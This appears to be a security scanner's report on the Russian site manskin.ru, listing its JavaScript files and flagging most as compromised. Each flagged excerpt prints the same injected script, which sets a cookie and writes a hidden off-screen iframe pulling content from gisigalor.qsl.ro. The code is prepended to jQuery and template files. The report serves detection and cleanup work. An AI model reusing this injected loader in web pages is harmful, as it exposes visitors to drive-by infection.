Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=manskin.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://manskin.ru/ | 200 OK Content-Length: 64062 Content-Type: text/html | clean |
http://manskin.ru/media/zoo/libraries/jquery/jquery.js?ver=20130202 | 200 OK Content-Length: 94572 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: gisigalor.qsl.ro ...[280 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */window.jQuery||function(p,l){function oa(a){var b=a.length,d=c.type(a);return c.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===d||"function"!==d&&(0===b||"number"===typeof b&&0<b&&b-1 in a)}function Pb(a){var b=Ra[a ...[3066 bytes skipped]... Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/media/zoo/assets/js/responsive.js?ver=20130202 | 200 OK Content-Length: 2439 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(b,e,f){function d(d){g.innerHTML='­<style media="'+d+'"> #mq-test-1 { width: 42px; }</style>';h.insertBefore(i,c);a=42==g.offsetWidth;h.removeChild(i);return a}function j(a){var b=d(a.media);if(a._listeners&&a.matches!=b){a.matches=b;for(var b=0,c=a._listeners.length;b<c;b++)a._listener ...[1253 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/components/com_zoo/assets/js/default.js?ver=20130202 | 200 OK Content-Length: 2333 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); jQuery(function(a){a("select.auto-submit").bind("change",function(){a('form[name="adminForm"]').submit()});var f={};a.matchHeight=a.matchHeight||function(b,d,e){var h=a(window),c=b&&f[b];if(!c){var c=f[b]={id:b,elements:d,deepest:e,match:function(){var b=this.revert(),c=0;a(this.elements).each(function(){c=Math.max(c,a ...[1096 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/media/zoo/libraries/jquery/jquery.js?ver=20140515 | 200 OK Content-Length: 94572 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: gisigalor.qsl.ro ...[280 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */window.jQuery||function(p,l){function oa(a){var b=a.length,d=c.type(a);return c.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===d||"function"!==d&&(0===b||"number"===typeof b&&0<b&&b-1 in a)}function Pb(a){var b=Ra[a ...[3066 bytes skipped]... Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/media/zoo/applications/jbuniversal/assets/js/jquery.jbzooprice.min.js?ver=20130213 | 200 OK Content-Length: 3671 Content-Type: application/x-javascript | clean |
http://manskin.ru/media/zoo/applications/jbuniversal/assets/js/jquery.mousewheel.min.js?ver=20121105 | 200 OK Content-Length: 1384 Content-Type: application/x-javascript | clean |
http://manskin.ru/media/zoo/applications/jbuniversal/assets/js/jquery.easing.min.js?ver=20121105 | 200 OK Content-Length: 3271 Content-Type: application/x-javascript | clean |
http://manskin.ru/media/zoo/applications/jbuniversal/assets/js/jquery.fancybox.min.js?ver=20130202 | 200 OK Content-Length: 28183 Content-Type: application/x-javascript | clean |
http://manskin.ru/cache/widgetkit/widgetkit-29a8da3a.js | 200 OK Content-Length: 22755 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[245 bytes skipped]... ).getTime()+expires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function takeOrlondo(name){var nachos=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return nachos?decodeURIComponent(nachos[1]):undefined;} var cookie=takeOrlondo('lirmanusik');if(cookie==undefined){setCookie('lirmanusik',true,259200);document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>');}} Art_protection();(function(g,f){var a={};f.$widgetkit={lazyloaders:{},load:function(b){a[b]||(a[b]=g.getScript(b));return a[b]},lazyload:function(a){a=a||document;g("[data-widgetkit]",a).each(function(){var a=g(this),b=a.data("widgetkit"),c=a.data("options")||{};!a.data("wk-loaded")&&$widgetkit.lazyloaders[b]&&($widgetkit.lazyloaders[b](a,c),a.d ...[2979 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/media/zoo/libraries/jquery/jquery-ui.custom.min.js?ver=20131108 | 200 OK Content-Length: 235398 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(a,f){function e(c,g){var d,e,f,l=c.nodeName.toLowerCase();return"area"===l?(d=c.parentNode,e=d.name,!c.href||!e||"map"!==d.nodeName.toLowerCase()?!1:(f=a("img[usemap=#"+e+"]")[0],!!f&&b(f))):(/input|select|textarea|button|object/.test(l)?!c.disabled:"a"===l?c.href||g:g)&&b(c)}function b(c){return a.ex ...[3067 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/templates/yoo_vanilla/warp/js/warp.js | 200 OK Content-Length: 8293 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(e){e.fn.matchHeight=function(f){var a=0;this.each(function(){a=Math.max(a,e(this).outerHeight())});f&&(a=Math.max(a,f));return this.each(function(){var c=e(this),b=c.outerHeight()-c.height();c.css("min-height",a-b+"px")})};e.fn.matchWidth=function(f){return this.each(function(){var a=e(this),c=a.children(f),b ...[3067 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/templates/yoo_vanilla/warp/js/accordionmenu.js | 200 OK Content-Length: 2350 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(c){var a=function(){};c.extend(a.prototype,{name:"accordionMenu",options:{mode:"default",display:null,collapseall:false},initialize:function(a,b){var b=c.extend({},this.options,b),f=a.find("ul.accordion"),g=a.find("li.toggler");if(g.length){var i=[];g.each(function(a){var h=c(this),e=h.find("span:first"),d=c(f[a]).pa ...[1088 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/templates/yoo_vanilla/warp/js/dropdownmenu.js | 200 OK Content-Length: 6623 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(a){var f=function(){};a.extend(f.prototype,{name:"dropdownMenu",options:{mode:"default",itemSelector:"li",firstLevelSelector:"li.level1",dropdownSelector:"ul",duration:600,remainTime:800,remainClass:"remain",transition:"easeOutExpo",withopacity:true,centerDropdown:false,reverseAnimation:false,fixWidth:false,fancy:nul ...[3112 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://manskin.ru/templates/yoo_vanilla/warp/js/spotlight.js | 200 OK Content-Length: 3585 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: gisigalor.qsl.ro ...[196 bytes skipped]... res='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(d){var c=function(){};d.extend(c.prototype,{name:"warpspotlight",options:{effect:"fade",duration:300,transition:"swing",right:300,left:300,top:300,bottom:300,fade:300},initialize:function(c,e){this.options=d.extend({},this.options,e);var a=this;d(String(c.attr("class")).split(" ")).each(function(b,c){if(d.inArray(c,[ ...[2325 bytes skipped]... Decoded script: <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://gisigalor.qsl.ro/adrisobel16.html This URL is marked by Google as suspicious <iframe src="http://gisigalor.qsl.ro/adrisobel16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: manskin.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 29 Sep 2014 08:20:37 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ce255c6afd3bdfb37dde53565ed7d516=vm45210hkc9pv5j640idonio42; path=/
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: manskin.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 29 Sep 2014 08:20:37 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ce255c6afd3bdfb37dde53565ed7d516=vm45210hkc9pv5j640idonio42; path=/
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: manskin.ru
Referer: http://www.google.com/search?q=manskin.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: manskin.ru
Referer: http://www.google.com/search?q=manskin.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.